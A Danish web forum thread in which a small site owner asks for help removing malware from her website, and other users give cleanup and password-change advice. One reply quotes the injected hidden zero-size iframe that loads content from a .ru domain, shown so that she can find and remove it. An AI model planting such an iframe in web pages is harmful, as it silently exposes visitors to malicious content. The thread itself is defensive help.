Hov. Du er ikke logget ind.
DU SKAL VÆRE LOGGET IND, FOR AT INTERAGERE PÅ DENNE SIDE

Hjælp ! Virus på hjemmeside

Side 1 ud af 1 (8 indlæg)
  • 1
Tilmeldt 30. Jun 10
Indlæg ialt: 13
Skrevet kl. 10:33
Hvor mange stjerner giver du? :

Jeg har desværre været så uheldig, at få virus på min hjemmeside.

Er der nogle herinde der ved hvordan man fjerner det ? Skriv gerne pris, hvis du kan hjælpe.

Tak :o)

Kh

Charlotte

- min hjemmeside hedder

www.charlottelindhardt.dk

Tilmeldt 18. May 10
Indlæg ialt: 181
Skrevet kl. 10:38
Hvor mange stjerner giver du? :

Jeg vil gerne forsøge at fjerne det. Kan se at du har fået indsat iframes med skadeligt indhold.

Det er denne iframe google siger er farlig (og som sikkert er).. Du kan selv fjerne den hvis du har mod på det, men ellers hjælper jeg dig gerne. Husk at skifte kodeord til ftp og mysql m.m.

Hvis du er lidt smart kan du med fordel få det fikset, og så skifte koden bagefter. Ved godt man bør stole på folk, men man kan aldrig være for forsigtig :)

<body class="homepage"><iframe src="http://quake2012.ru/in.php?a=QQkFBwQHBAEABQQMEkcJBQcEBwYABQcHDA==" width="0" height="0" frameborder="0"></iframe>
Tilmeldt 18. May 10
Indlæg ialt: 181
Skrevet kl. 10:39
Hvor mange stjerner giver du? :

Vil lige tilføje - du skal ikke slette body-tag'et, det var bare for at vise dig hvor henne det var :)

Tilmeldt 10. Nov 09
Indlæg ialt: 0
Skrevet kl. 10:41
Hvor mange stjerner giver du? :

Som allerede nævnt er det den iframe der ligger lige efter bodytagget der er problemet.

Den påvirker din side fordi klienten mener du hoster det pågældende indhold fra iframen.

SPørgsmålet er så, hvorfor har du fået den derind? Hvordan laver du din hjemmeside?

Fra København
Tilmeldt 22. Jul 10
Indlæg ialt: 338
Fra  Jivana Skrevet kl. 10:46
Hvor mange stjerner giver du? :

Log ind via FTP og fjern alle filer

Opload dine websider igen fra virusfri kopi du forhåbentlig har gemt selv på din PC eller andet sted

Husk at tjekke for evt. hacks i .htaccess fil (har oplevet dette selv )

Skift FTP password og evt brugerpassword 

Orienter din webudbyder om at website har været hacket - det bør undersøges hvordan hacking er lykkes, kan skyldes manglende i serversikkerhed hos udbyder.

Note - dårlig ide at besøge webside, når den er hacket er det jo usikkert hvad der vil ske for besøgende!

Glad indehaver af Jivana webshop - vi sælger Økologisk kosmetik og makeup - tjek os ud!

Tilmeldt 10. Sep 08
Indlæg ialt: 113
Skrevet kl. 10:47
Hvor mange stjerner giver du? :

Hej Charlotte

Du skal gøre følgende:

1. Ændre alle passwords til din hjemmeside inkl. ftp

2. Fjerne den iframe og evt. andet der er inficeret

3. Find kilden til problemet ellers har du problemet igen i løbet af få timer

3a. Start med at finde ud af om den computer du logger ind fra er inficeret med noget malware e.l. flere af disse vira opsnapper kodeordet når du logger ind og bruger det til at inficere din hjemmeside. Så log ALDRIG ind fra en computer du ikke har tillid til.

3b. Der kan være sikkerhedshuller på din hjemmeside. Det kan være svært at gennemskue uden at få hjælp til det, men en god tommefingerregel er at få opdateret alt software/scripts på hjemmesiden til nyeste versioner. 

Jeg har desværre ikke tid til at hjælpe dig, men hvis du finder en til at hjælpe så sørg for at få styr på ovenstående punkter.

Mvh. Jens

Tilmeldt 18. May 10
Indlæg ialt: 181
Skrevet kl. 11:05
Hvor mange stjerner giver du? :

@Kim

Nu er det sådan at jeg altid har en gammel computer lige ved hånden, der ikke ligger noget på, og som kører via en liveCD. Så jeg mener ikke at jeg løber den store risiko ved det.

Computeren står der til dette formål ;)

Fra Tjenester.dk
Tilmeldt 12. Jun 11
Indlæg ialt: 718
Skrevet kl. 11:38
Hvor mange stjerner giver du? :

Billige seo pakker

Side 1 ud af 1 (8 indlæg)